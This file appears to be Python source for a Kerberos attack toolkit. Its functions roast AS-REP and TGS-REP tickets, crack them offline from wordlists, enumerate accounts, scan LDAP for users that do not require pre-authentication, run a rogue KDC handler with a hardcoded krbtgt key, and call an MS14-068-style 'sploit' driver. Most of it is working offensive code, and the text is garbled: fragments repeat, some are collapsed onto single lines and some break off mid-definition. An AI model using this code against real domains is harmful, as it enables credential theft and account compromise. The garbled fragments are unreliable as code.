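def do_net_get_tgs_rep(self, line):
    """Obtain a TGS-REP for the configured user, or test one password against a captured one.

    Forms:
      ``net_get_tgs_rep <hex_tgs_rep> <password>``
          Offline: derive an RC4-HMAC (NT hash) key from *password* and hand
          it, with the hex-encoded TGS-REP, to crack_tgs_rep(). No network.
      ``net_get_tgs_rep``
          Online: needs set_arg 'domain', 'username' and 'dc'. Resolves the
          user's SID (net_get_user_sid -> set_arg['user_sid']), requests a
          TGT for krbtgt in the user's realm, then a service ticket for
          set_arg['target_service'], written as ``service/realm``.

    Both forms require set_arg['password'] and set_arg['target_service'];
    anything missing or malformed goes to krbTricks.bad_cmd(). Errors on
    the online path are printed; nothing is raised to the caller.
    """
    args = krbTricks.set_arg
    if 'password' not in args or 'target_service' not in args:
        krbTricks.bad_cmd(self, 'net_get_tgs_rep')
        return
    user_key = (RC4_HMAC, ntlm_hash(args['password']).digest())

    if len(line) >= 3:
        # Offline form. Validate the split instead of unpacking blindly: a
        # line without a separator used to raise an uncaught ValueError.
        parts = line.split(' ', 1)
        if len(parts) != 2:
            krbTricks.bad_cmd(self, 'net_get_tgs_rep')
            return
        pkt, plaintext_password = parts
        user_key = (RC4_HMAC, ntlm_hash(plaintext_password).digest())
        crack_tgs_rep(user_key, pkt, plaintext_password)
        return

    if not all(k in args for k in ('domain', 'username', 'dc')):
        krbTricks.bad_cmd(self, 'net_get_tgs_rep')
        return

    try:
        # Fills set_arg['user_sid'], read below. The repeated username
        # argument mirrors the original call; check it against
        # net_get_user_sid's signature before changing it.
        net_get_user_sid(args['dc'], args['username'], args['domain'],
                         args['password'], args['username'])
        user_realm = args['domain']
        user_name = args['username']
        user_sid = args['user_sid']
        kdc_a = args['dc']
        target_host = None
        # 'pre' is read by the request helpers (presumably to send a real
        # PA-ENC-TIMESTAMP pre-authentication -- confirm in net_get_tgs_rep).
        # It is reset in `finally` so a failure here cannot leave it True
        # for the later no-pre-auth commands.
        args['pre'] = True
        # First a TGT in the user's own realm ...
        net_get_tgs_rep(user_realm, user_name, user_sid, user_key, kdc_a,
                        user_realm, 'krbtgt', target_host,
                        krbtgt_a_key=None, trust_ab_key=None, target_key=None)
        # ... then the service ticket for "service/realm".
        target_service, target_realm = args['target_service'].split('/')
        net_get_tgs_rep(user_realm, user_name, user_sid, user_key, kdc_a,
                        target_realm, target_service, target_host,
                        krbtgt_a_key=None, trust_ab_key=None, target_key=None)
    except Exception as exc:
        # Narrowed from a bare except so Ctrl-C still interrupts the shell,
        # and the cause is shown instead of being swallowed.
        print(' Uh-oh, something went wrong :( [%s: %s]' % (type(exc).__name__, exc))
    finally:
        args['pre'] = False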
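def do_net_get_as_rep(self, line):
    """Send one AS-REQ without pre-authentication for set_arg['username'] and record the verdict.

    Requires set_arg 'domain', 'username' and 'dc'. The request is built by
    net_get_as_rep() with padata type 149 (PA-PAC-REQUEST) and a dummy key;
    the DC's answer, left hex-encoded in set_arg['net_krbas'], classifies
    the account:

      * AS-REP (msg-type 11)  -- pre-auth not required: the reply is kept
                                 under 'krbas' for offline cracking
      * KRB-ERROR code 25     -- pre-auth required: the user exists
      * KRB-ERROR code 18     -- client revoked: the user exists (locked)
      * KRB-ERROR code 6      -- principal unknown: nothing recorded

    Loot is keyed by (user_name, domain): an existing entry is updated in
    place instead of appending a duplicate (the original's open todo).

    NOTE(review): the original reset set_arg['pre'] to False and then
    tested it, so its PA-ENC-TIMESTAMP branch (padata type 2 with the real
    password) was unreachable. The reset is kept and the dead branch
    dropped; observable behaviour is unchanged.
    """
    args = krbTricks.set_arg
    args['pre'] = False
    if not all(k in args for k in ('domain', 'username', 'dc')):
        krbTricks.bad_cmd(self, 'net_get_as_rep')
        return

    args['padata_type'] = 149
    user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
    # Placeholder SID carried over from the original; presumably unused by
    # a pre-auth-less AS-REQ -- confirm against net_get_as_rep().
    user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
    user_realm = args['domain']
    user_name = args['username']
    kdc_a = args['dc']

    try:
        net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a)
        # Decoded without an ASN.1 spec, so indices are positional over the
        # fields actually present: [1] is msg-type for AS-REP and KRB-ERROR
        # alike, and [4] is the error-code of a KRB-ERROR that omits
        # ctime/cusec (pvno, msg-type, stime, susec, error-code, ...).
        rep = decoder.decode(args['net_krbas'].decode('hex'))[0]
        msg_type = rep[1]
        err_code = rep[4] if len(rep) > 4 else None

        entry = {'user_name': user_name, 'domain': user_realm,
                 'target_service': 'krbtgt'}
        record = False
        if msg_type == 11:
            print(" [+] Got a valid AS-REP for %s... Done!" % user_name)
            entry['krbas'] = args['net_krbas']
            record = True
        elif err_code == 25:
            print(" [-] Invalid AS-REP for %s... " % user_name)
            print(" [+] Got a valid user name (%s)... Done!" % user_name)
            record = True
        elif err_code == 18:
            print(" [-] Invalid AS-REP for %s... " % user_name)
            print(" [+] %s locked... Done!" % user_name)
            record = True
        elif err_code == 6:
            # KDC_ERR_C_PRINCIPAL_UNKNOWN: not an account, nothing to keep.
            print(" [-] Not a valid user name (%s)... " % user_name)

        if record:
            existing = next((item for item in krbTricks.loot
                             if item.get('user_name') == user_name
                             and item.get('domain') == user_realm), None)
            if existing is None:
                krbTricks.loot.append(entry)
            else:
                existing.update(entry)

        args['padata_type'] = ''
        show('users')
    except Exception as exc:
        # Narrowed from a bare except so Ctrl-C is not swallowed.
        print(' Uh-oh, something went wrong :( [%s: %s]' % (type(exc).__name__, exc))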
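def do_crack_as_rep_manual(self, line):
    """Dictionary-attack one captured AS-REP: ``crack_as_rep_manual <loot index>``.

    Requires set_arg['wordlist'] and a loot entry at the given index that
    holds 'krbas'. Each candidate word becomes an RC4-HMAC (NT hash) key
    and is tried with crack_as_rep(); the first hit is stored as the
    entry's 'password'. A non-numeric or out-of-range index goes to
    krbTricks.bad_cmd() (the original raised a traceback). Otherwise the
    command always ends by printing the user table via show('users').
    """
    try:
        target = krbTricks.loot[int(line)]
    except (ValueError, IndexError):
        krbTricks.bad_cmd(self, 'crack_as_rep_manual')
        return

    if 'krbas' in target and 'wordlist' in krbTricks.set_arg:
        # Stream the wordlist and close it deterministically (the original
        # never closed the file). CRLF is stripped too so Windows-style
        # wordlists match.
        with open(krbTricks.set_arg['wordlist']) as wordlist:
            for raw in wordlist:
                word = raw.rstrip('\r\n')
                user_key = (RC4_HMAC, ntlm_hash(word).digest())
                if crack_as_rep(user_key, target['krbas'], word):
                    target['password'] = word
                    break
    show('users')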
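def do_crack_tgs_rep(self, line):
    """Dictionary-attack every captured TGS-REP that has no password yet.

    For each loot entry holding 'krbtgs' but no 'password', each word of
    set_arg['wordlist'] is turned into an RC4-HMAC (NT hash) key and tried
    with crack_tgs_rep(); the first hit is stored as the entry's
    'password'. Without a wordlist nothing is attempted. The wordlist is
    read once and the file closed (the original re-read it for every
    account and never closed it). Ends with show('users').
    """
    wordlist_path = None
    if 'wordlist' in krbTricks.set_arg:
        wordlist_path = krbTricks.set_arg['wordlist']
    words = None  # loaded on first use so a missing wordlist stays a no-op

    for entry in krbTricks.loot:
        if wordlist_path is None or 'krbtgs' not in entry or 'password' in entry:
            continue
        print(" Trying to crack %s" % entry['user_name'])
        if words is None:
            with open(wordlist_path) as wordlist:
                words = [raw.rstrip('\r\n') for raw in wordlist]
        for word in words:
            user_key = (RC4_HMAC, ntlm_hash(word).digest())
            if crack_tgs_rep(user_key, entry['krbtgs'], word):
                entry['password'] = word
                break
    show('users')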
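def do_brute_no_pre_auth(self, line):
    """Enumerate accounts listed in set_arg['userlist'] with pre-auth-less AS-REQs.

    For every username not already present in krbTricks.loot, send an
    AS-REQ (padata type 149, dummy key) to set_arg['dc'] for
    set_arg['domain'] and classify the reply exactly as do_net_get_as_rep
    does: AS-REP (msg-type 11) -> entry with the hex reply under 'krbas';
    KRB-ERROR 25 or 18 -> valid user; anything else (e.g. 6, principal
    unknown) -> not recorded. The first transport failure aborts the run.
    Requires 'userlist', 'domain' and 'dc' in set_arg, else
    krbTricks.bad_cmd(). Ends by printing the user table (show('users')).
    """
    args = krbTricks.set_arg
    args['pre'] = False
    try:
        # Read once and close the file (the original never closed it).
        with open(args['userlist']) as userlist:
            names = [raw.rstrip('\r\n') for raw in userlist]
    except (KeyError, IOError, OSError):
        krbTricks.bad_cmd(self, 'brute_no_pre_auth')
        return
    if 'domain' not in args or 'dc' not in args:
        krbTricks.bad_cmd(self, 'brute_no_pre_auth')
        return

    user_realm = args['domain']
    kdc_a = args['dc']
    user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
    # Placeholder SID carried over from the original; presumably unused by
    # a pre-auth-less AS-REQ -- confirm against net_get_as_rep().
    user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
    known = set(item.get('user_name') for item in krbTricks.loot)

    for user_name in names:
        if not user_name or user_name in known:
            # Blank line in the list, or already enumerated: skip quietly.
            continue
        args['padata_type'] = 149
        try:
            net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a)
        except Exception as exc:
            print(" can't send data to the DC ? [%s]\n" % exc)
            return
        args['padata_type'] = ''
        try:
            # See do_net_get_as_rep for why [1] / [4] are msg-type / error-code.
            rep = decoder.decode(args['net_krbas'].decode('hex'))[0]
            msg_type = rep[1]
            err_code = rep[4] if len(rep) > 4 else None
        except Exception:
            # Was hard-coded to "dc.onlyfor.hax"; report the DC actually used.
            print(' [+] Decoding AS-REP from %s... No Ticket\n' % kdc_a)
            continue

        entry = {'user_name': user_name, 'domain': user_realm,
                 'target_service': 'krbtgt'}
        if msg_type == 11:
            entry['krbas'] = args['net_krbas']
        elif err_code not in (25, 18):
            continue
        krbTricks.loot.append(entry)
        known.add(user_name)
    show('users')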
print >> sys.stderr, ' -p <clearPassword>' print >> sys.stderr, ' --rc4 <ntlmHash>' sys.exit(1) opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4=']) opts = dict(opts) if not all(k in opts for k in ('-u', '-s', '-d')): usage_and_exit() user_name, user_realm = opts['-u'].split('@', 1) user_sid = opts['-s'] kdc_a = opts['-d'] if '--rc4' in opts: user_key = (RC4_HMAC, opts['--rc4'].decode('hex')) assert len(user_key[1]) == 16 elif '-p' in opts: user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest()) else: user_key = (RC4_HMAC, ntlm_hash(getpass('Password: '******'TGT_%s@%s.ccache' % (user_name, user_realm) user_realm = user_realm.upper() target_realm = target_realm.upper() sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
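def _set_principal(rep, field, src):
    """Copy a PrincipalName from the request into ``rep[field]``.

    Every name-string component is copied. The original copied one cname
    and exactly two sname components, so a request whose sname had a
    single component crashed the handler with IndexError.
    """
    rep[field] = None  # instantiate the optional component
    rep[field]['name-type'] = int(src['name-type'])
    rep[field]['name-string'] = None
    for idx, part in enumerate(src['name-string']):
        rep[field]['name-string'][idx] = str(part)


def _krb_error(req, realm, error_code, e_text=None, e_data=None):
    """Build a KRB-ERROR (msg-type 30) answering *req* with *error_code*.

    crealm/realm are set to *realm*, cname/sname are echoed from the
    request body and stime/susec are the current time. e-text and e-data
    are set only when given.
    """
    gt, ms = epoch2gt(time(), microseconds=True)
    rep = KrbError()
    rep['pvno'] = 5
    rep['msg-type'] = 30
    rep['stime'] = gt
    rep['susec'] = ms
    rep['error-code'] = error_code
    rep['crealm'] = realm
    _set_principal(rep, 'cname', req['req-body']['cname'])
    rep['realm'] = realm
    _set_principal(rep, 'sname', req['req-body']['sname'])
    if e_text is not None:
        rep['e-text'] = e_text
    if e_data is not None:
        rep['e-data'] = e_data
    return rep


def handleAsReq(data):
    """Answer one DER-encoded AS-REQ as the rogue KDC; return the DER reply.

    Decision order:
      1. No PA-ENC-TIMESTAMP (padata-type 2) present -> KRB-ERROR 25
         (KDC_ERR_PREAUTH_REQUIRED) carrying a static METHOD-DATA e-data
         that advertises, among others, PA-ENC-TIMESTAMP and
         PA-ETYPE-INFO/INFO2 for etype 23 (rc4-hmac).
      2. Otherwise the timestamp is trial-decrypted (key usage 1) under
         each password in the module-level ``valid_pws``; the first that
         decrypts becomes the client key.
      3. sname kadmin/changepw -> AS-REP built with USER_EXP_KEY, whether
         or not the pre-auth was valid.
      4. Else: valid pre-auth -> normal AS-REP under the matched key;
         invalid -> KRB-ERROR 23 (KDC_ERR_KEY_EXPIRED).

    *data* is untrusted network input: ASN.1 decode errors propagate to
    the caller, which should catch them per datagram.
    """
    req = decode(data, asn1Spec=AsReq())[0]
    body = req['req-body']
    realm = str(body['realm'])

    # Locate PA-ENC-TIMESTAMP and keep its EncryptedData.cipher bytes.
    pre_auth = None
    if req['padata'] != None:  # pyasn1 absent-OPTIONAL test, kept as in the original
        for padata in req['padata']:
            if padata['padata-type'] == 2:
                enc = decode(str(padata['padata-value']), asn1Spec=EncryptedData())[0]
                pre_auth = str(enc['cipher'])
                break

    if pre_auth is None:
        # Pre-encoded METHOD-DATA, one PA-DATA per literal below.
        method_data = binascii.unhexlify(
            '3061'
            '3009a103020110a2020400'
            '3009a10302010fa2020400'
            '3009a103020102a2020400'
            '300aa1040202008aa2020400'
            '300aa10402020088a2020400'
            '3012a10302010ba20b040930073005a003020117'
            '3012a103020113a20b040930073005a003020117')
        rep = _krb_error(req, realm, 25,
                         e_text='Need to use PA-ENC-TIMESTAMP/PA-PK-AS-REQ',
                         e_data=method_data)
        print("Replying with pre-auth required")
        return encode(rep)

    # Trial-decrypt the timestamp (key usage 1) under each known password.
    client_key = None
    for pw in valid_pws:
        candidate = (RC4_HMAC, ntlm_hash(pw).digest())
        try:
            decrypt(RC4_HMAC, candidate[1], 1, pre_auth)
        except Exception:
            continue  # wrong key (or corrupt blob): try the next password
        client_key = candidate
        break
    print("Is using a valid pre-auth password: %s" % (client_key is not None))

    sname = [str(part) for part in body['sname']['name-string']]
    if sname[:2] == ['kadmin', 'changepw']:
        rep = buildAsRep(req, USER_EXP_KEY)
        print("Replying with AS response for kadmin/changepw")
    elif client_key is not None:
        rep = buildAsRep(req, client_key)
        print("Replying with normal AS-REP")
    else:
        rep = _krb_error(req, realm, 23)
        print("Replying with password expired error")
    return encode(rep)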
from twisted.internet.protocol import DatagramProtocol from twisted.internet import protocol, reactor, endpoints from pyasn1.codec.der.encoder import encode from pyasn1.codec.der.decoder import decode from pyasn1.type.char import GeneralString from pyasn1.type.univ import Integer, Sequence, SequenceOf, OctetString, BitString, Boolean from pyasn1.type.namedtype import NamedTypes, NamedType, OptionalNamedType from kek.krb5 import _c, application, AsReq, APReq, Authenticator, KerberosTime, Realm, PrincipalName, AsRep, NT_PRINCIPAL, NT_SRV_INST, EncTicketPart, EncASRepPart, EncryptedData, HostAddress, Microseconds, EncryptionKey, TgsReq, EncTGSRepPart, TgsRep from kek.util import epoch2gt, gt2epoch from kek.crypto import RC4_HMAC, encrypt, decrypt, ntlm_hash KRBTGT_KEY = (RC4_HMAC, binascii.unhexlify('0468cebdfc8a86e2578dca9406309611')) USER_EXP_KEY = (RC4_HMAC, ntlm_hash('a').digest()) class KrbError(Sequence): tagSet = application(30) componentType = NamedTypes( NamedType('pvno', _c(0, Integer())), NamedType('msg-type', _c(1, Integer())), OptionalNamedType('ctime', _c(2, KerberosTime())), OptionalNamedType('cusec', _c(3, Integer())), NamedType('stime', _c(4, KerberosTime())), NamedType('susec', _c(5, Integer())), NamedType('error-code', _c(6, Integer())), OptionalNamedType('crealm', _c(7, Realm())), OptionalNamedType('cname', _c(8, PrincipalName())), NamedType('realm', _c(9, Realm())), NamedType('sname', _c(10, PrincipalName())),
print >> sys.stderr, 'OPTIONS:' print >> sys.stderr, ' -p <clearPassword>' print >> sys.stderr, ' --rc4 <ntlmHash>' sys.exit(1) opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4=']) opts = dict(opts) if not all(k in opts for k in ('-u', '-s', '-d')): usage_and_exit() user_name, user_realm = opts['-u'].split('@', 1) user_sid = opts['-s'] kdc_a = opts['-d'] if '--rc4' in opts: user_key = (RC4_HMAC, opts['--rc4'].decode('hex')) assert len(user_key[1]) == 16 elif '-p' in opts: user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest()) else: user_key = (RC4_HMAC, ntlm_hash(getpass('Password: '******'TGT_%s@%s.ccache' % (user_name, user_realm) user_realm = user_realm.upper() target_realm = target_realm.upper() sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
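def _set_principal(rep, field, src):
    """Copy a PrincipalName from the request into ``rep[field]``.

    Every name-string component is copied. The original copied one cname
    and exactly two sname components, so a request whose sname had a
    single component crashed the handler with IndexError.
    """
    rep[field] = None  # instantiate the optional component
    rep[field]['name-type'] = int(src['name-type'])
    rep[field]['name-string'] = None
    for idx, part in enumerate(src['name-string']):
        rep[field]['name-string'][idx] = str(part)


def _krb_error(req, realm, error_code, e_text=None, e_data=None):
    """Build a KRB-ERROR (msg-type 30) answering *req* with *error_code*.

    crealm/realm are set to *realm*, cname/sname are echoed from the
    request body and stime/susec are the current time. e-text and e-data
    are set only when given.
    """
    gt, ms = epoch2gt(time(), microseconds=True)
    rep = KrbError()
    rep['pvno'] = 5
    rep['msg-type'] = 30
    rep['stime'] = gt
    rep['susec'] = ms
    rep['error-code'] = error_code
    rep['crealm'] = realm
    _set_principal(rep, 'cname', req['req-body']['cname'])
    rep['realm'] = realm
    _set_principal(rep, 'sname', req['req-body']['sname'])
    if e_text is not None:
        rep['e-text'] = e_text
    if e_data is not None:
        rep['e-data'] = e_data
    return rep


def handleAsReq(data):
    """Answer one DER-encoded AS-REQ as the rogue KDC; return the DER reply.

    Decision order:
      1. No PA-ENC-TIMESTAMP (padata-type 2) present -> KRB-ERROR 25
         (KDC_ERR_PREAUTH_REQUIRED) carrying a static METHOD-DATA e-data
         that advertises, among others, PA-ENC-TIMESTAMP and
         PA-ETYPE-INFO/INFO2 for etype 23 (rc4-hmac).
      2. Otherwise the timestamp is trial-decrypted (key usage 1) under
         each password in the module-level ``valid_pws``; the first that
         decrypts becomes the client key.
      3. sname kadmin/changepw -> AS-REP built with USER_EXP_KEY, whether
         or not the pre-auth was valid.
      4. Else: valid pre-auth -> normal AS-REP under the matched key;
         invalid -> KRB-ERROR 23 (KDC_ERR_KEY_EXPIRED).

    *data* is untrusted network input: ASN.1 decode errors propagate to
    the caller, which should catch them per datagram.
    """
    req = decode(data, asn1Spec=AsReq())[0]
    body = req['req-body']
    realm = str(body['realm'])

    # Locate PA-ENC-TIMESTAMP and keep its EncryptedData.cipher bytes.
    pre_auth = None
    if req['padata'] != None:  # pyasn1 absent-OPTIONAL test, kept as in the original
        for padata in req['padata']:
            if padata['padata-type'] == 2:
                enc = decode(str(padata['padata-value']), asn1Spec=EncryptedData())[0]
                pre_auth = str(enc['cipher'])
                break

    if pre_auth is None:
        # Pre-encoded METHOD-DATA, one PA-DATA per literal below.
        method_data = binascii.unhexlify(
            '3061'
            '3009a103020110a2020400'
            '3009a10302010fa2020400'
            '3009a103020102a2020400'
            '300aa1040202008aa2020400'
            '300aa10402020088a2020400'
            '3012a10302010ba20b040930073005a003020117'
            '3012a103020113a20b040930073005a003020117')
        rep = _krb_error(req, realm, 25,
                         e_text='Need to use PA-ENC-TIMESTAMP/PA-PK-AS-REQ',
                         e_data=method_data)
        print("Replying with pre-auth required")
        return encode(rep)

    # Trial-decrypt the timestamp (key usage 1) under each known password.
    client_key = None
    for pw in valid_pws:
        candidate = (RC4_HMAC, ntlm_hash(pw).digest())
        try:
            decrypt(RC4_HMAC, candidate[1], 1, pre_auth)
        except Exception:
            continue  # wrong key (or corrupt blob): try the next password
        client_key = candidate
        break
    print("Is using a valid pre-auth password: %s" % (client_key is not None))

    sname = [str(part) for part in body['sname']['name-string']]
    if sname[:2] == ['kadmin', 'changepw']:
        rep = buildAsRep(req, USER_EXP_KEY)
        print("Replying with AS response for kadmin/changepw")
    elif client_key is not None:
        rep = buildAsRep(req, client_key)
        print("Replying with normal AS-REP")
    else:
        rep = _krb_error(req, realm, 23)
        print("Replying with password expired error")
    return encode(rep)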
from twisted.internet.protocol import DatagramProtocol from twisted.internet import protocol, reactor, endpoints from pyasn1.codec.der.encoder import encode from pyasn1.codec.der.decoder import decode from pyasn1.type.char import GeneralString from pyasn1.type.univ import Integer, Sequence, SequenceOf, OctetString, BitString, Boolean from pyasn1.type.namedtype import NamedTypes, NamedType, OptionalNamedType from kek.krb5 import _c, application, AsReq, APReq, Authenticator, KerberosTime, Realm, PrincipalName, AsRep, NT_PRINCIPAL, NT_SRV_INST, EncTicketPart, EncASRepPart, EncryptedData, HostAddress, Microseconds, EncryptionKey, TgsReq, EncTGSRepPart, TgsRep from kek.util import epoch2gt, gt2epoch from kek.crypto import RC4_HMAC, encrypt, decrypt, ntlm_hash KRBTGT_KEY = (RC4_HMAC, binascii.unhexlify('0468cebdfc8a86e2578dca9406309611')) USER_EXP_KEY = (RC4_HMAC, ntlm_hash('a').digest()) class KrbError(Sequence): tagSet = application(30) componentType = NamedTypes( NamedType('pvno', _c(0, Integer())), NamedType('msg-type', _c(1, Integer())), OptionalNamedType('ctime', _c(2, KerberosTime())), OptionalNamedType('cusec', _c(3, Integer())), NamedType('stime', _c(4, KerberosTime())), NamedType('susec', _c(5, Integer())), NamedType('error-code', _c(6, Integer())), OptionalNamedType('crealm', _c(7, Realm())), OptionalNamedType('cname', _c(8, PrincipalName())), NamedType('realm', _c(9, Realm())),
print >> sys.stderr, "OPTIONS:" print >> sys.stderr, " -p <clearPassword>" print >> sys.stderr, " --rc4 <ntlmHash>" sys.exit(1) opts, args = getopt(sys.argv[1:], "u:s:d:p:", ["rc4="]) opts = dict(opts) if not all(k in opts for k in ("-u", "-s", "-d")): usage_and_exit() user_name, user_realm = opts["-u"].split("@", 1) user_sid = opts["-s"] kdc_a = opts["-d"] if "--rc4" in opts: user_key = (RC4_HMAC, opts["--rc4"].decode("hex")) assert len(user_key[1]) == 16 elif "-p" in opts: user_key = (RC4_HMAC, ntlm_hash(opts["-p"]).digest()) else: user_key = (RC4_HMAC, ntlm_hash(getpass("Password: "******"TGT_%s@%s.ccache" % (user_name, user_realm) user_realm = user_realm.upper() target_realm = target_realm.upper() sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
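def _sid_to_string(raw_sid):
    """Render a binary Windows SID as ``S-<rev>-<authority>-<sub1>-...-<subN>``.

    Layout: byte 0 revision, byte 1 sub-authority count, bytes 2..7 the
    48-bit big-endian identifier authority, then ``count`` 4-byte
    little-endian sub-authorities. The count byte is honoured (the
    original computed it and then ignored it, always reading five
    sub-authorities). Raises ValueError when the buffer is shorter than
    the header or than the declared count.
    """
    buf = bytearray(raw_sid)
    if len(buf) < 8:
        raise ValueError('SID shorter than its 8-byte header')
    revision, count = buf[0], buf[1]
    if len(buf) < 8 + 4 * count:
        raise ValueError('SID truncated: %d sub-authorities declared' % count)
    authority = 0
    for octet in buf[2:8]:
        authority = (authority << 8) | octet
    parts = ['S', str(revision), str(authority)]
    for i in range(count):
        off = 8 + 4 * i
        parts.append(str(buf[off] | (buf[off + 1] << 8)
                         | (buf[off + 2] << 16) | (buf[off + 3] << 24)))
    return '-'.join(parts)


def scan_ldap_no_pre_auth(dc, bindusername, binddomain, bindpass):
    """List AD accounts that do not require Kerberos pre-auth and AS-REP-roast each one.

    Binds to *dc* as ``bindusername@binddomain`` with *bindpass* (simple
    bind), searches the domain subtree for user objects whose
    userAccountControl has DONT_REQ_PREAUTH (0x400000) set, prints a few
    attributes per hit, then sends a pre-auth-less AS-REQ through
    net_get_as_rep() and records the verdict in krbTricks.loot the same
    way do_net_get_as_rep does (AS-REP -> 'krbas' kept; KRB-ERROR 25/18
    -> valid user; 6 -> not a user). Ends with show('users').

    Security note: ldap.open() + simple_bind_s() sends the bind password
    in clear text. Use it only where the LDAP path is trusted, or switch
    to start_tls_s() / ldaps:// for real engagements.

    Changes from the original ("todo fix filter, currently static"): the
    filter matched the exact value 4260352 (NORMAL_ACCOUNT |
    DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH) and so missed any account with
    other flags; it now uses the LDAP bitwise-AND matching rule. The base
    DN is the domain root rather than cn=Users so accounts in OUs are
    found, and referral entries (dn None) are skipped. The SID is decoded
    by _sid_to_string(), honouring the sub-authority count.
    """
    binddn = bindusername + '@' + binddomain
    basedn = ','.join('dc=' + part for part in binddomain.split('.'))
    try:
        conn = ldap.open(dc)
        # A domain-root subtree search returns referrals; do not chase them
        # (python-ldap would retry them anonymously and fail the search).
        conn.set_option(ldap.OPT_REFERRALS, 0)
        conn.simple_bind_s(binddn, bindpass)
        # 1.2.840.113556.1.4.803 = LDAP_MATCHING_RULE_BIT_AND; 4194304 = 0x400000
        search_filter = ('(&(objectClass=user)'
                         '(userAccountControl:1.2.840.113556.1.4.803:=4194304))')
        result = conn.search_s(basedn, ldap.SCOPE_SUBTREE, search_filter, ['*'])
    except ldap.LDAPError as e:
        print(e)
        return

    for dn, attrs in result:
        if dn is None or not isinstance(attrs, dict):
            continue  # referral, not an object
        if 'sAMAccountName' not in attrs:
            continue
        sam = attrs['sAMAccountName'][0]
        print(sam)
        if 'primaryGroupID' in attrs:
            print(' primaryGroupID = ' + attrs['primaryGroupID'][0])
        if 'distinguishedName' in attrs:
            print(' distinguishedName = ' + attrs['distinguishedName'][0])

        # Placeholder carried over from the original for accounts without a
        # readable objectSid; presumably unused by a pre-auth-less AS-REQ --
        # confirm against net_get_as_rep().
        user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
        if 'objectSid' in attrs:
            try:
                user_sid = _sid_to_string(attrs['objectSid'][0])
                print(' Sid = ' + user_sid)
            except ValueError as e:
                print(' Sid = <unparseable: %s>' % e)
        if 'badPwdCount' in attrs:
            print(' badPwdCount = ' + attrs['badPwdCount'][0])
        if 'givenName' in attrs:
            print(' givenName = ' + attrs['givenName'][0])

        krbTricks.set_arg['pre'] = False
        user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
        try:
            net_get_as_rep(binddomain, sam, user_sid, user_key, dc)
            # Decoded without a spec: [1] is msg-type, [4] the error-code of
            # a KRB-ERROR without ctime/cusec (see do_net_get_as_rep).
            rep = decoder.decode(krbTricks.set_arg['net_krbas'].decode('hex'))[0]
        except Exception as exc:
            print(" can't send data to the DC ? [%s]\n" % exc)
            continue
        msg_type = rep[1]
        err_code = rep[4] if len(rep) > 4 else None

        entry = {'user_name': sam, 'domain': binddomain, 'target_service': 'krbtgt'}
        if msg_type == 11:
            print(" [+] Got a valid AS-REP for %s... Done!" % sam)
            entry['krbas'] = krbTricks.set_arg['net_krbas']
            krbTricks.loot.append(entry)
        elif err_code == 25:
            print(" [-] Invalid AS-REP for %s... " % sam)
            print(" [+] Got a valid user name (%s)... Done!" % sam)
            krbTricks.loot.append(entry)
        elif err_code == 18:
            print(" [-] Invalid AS-REP for %s... " % sam)
            print(" [+] %s locked... Done!" % sam)
            krbTricks.loot.append(entry)
        elif err_code == 6:
            # KDC_ERR_C_PRINCIPAL_UNKNOWN: nothing to keep.
            print(" [-] Not a valid user name (%s)... " % sam)
        krbTricks.set_arg['padata_type'] = ''
    show('users')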
#print >> sys.stderr, ' -p <clearPassword>' #print >> sys.stderr, ' --rc4 <ntlmHash>' sys.exit(1) opts, args = getopt(sys.argv[1:], 'u:d:p:', ['rc4=']) opts = dict(opts) if not all(k in opts for k in ('-u', '-d')): usage_and_exit() user_name, user_realm = opts['-u'].split('@', 1) #user_sid = opts['-s'] kdc_a = opts['-d'] if '--rc4' in opts: user_key = (RC4_HMAC, opts['--rc4'].decode('hex')) assert len(user_key[1]) == 16 elif '-p' in opts: user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest()) else: user_key = (RC4_HMAC, ntlm_hash(' ').digest()) target_realm = user_realm target_service = target_host = kdc_b = None filename = 'TGT_%s@%s.ccache' % (user_name, user_realm) user_realm = user_realm.upper() target_realm = target_realm.upper() sploit(user_realm, user_name, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)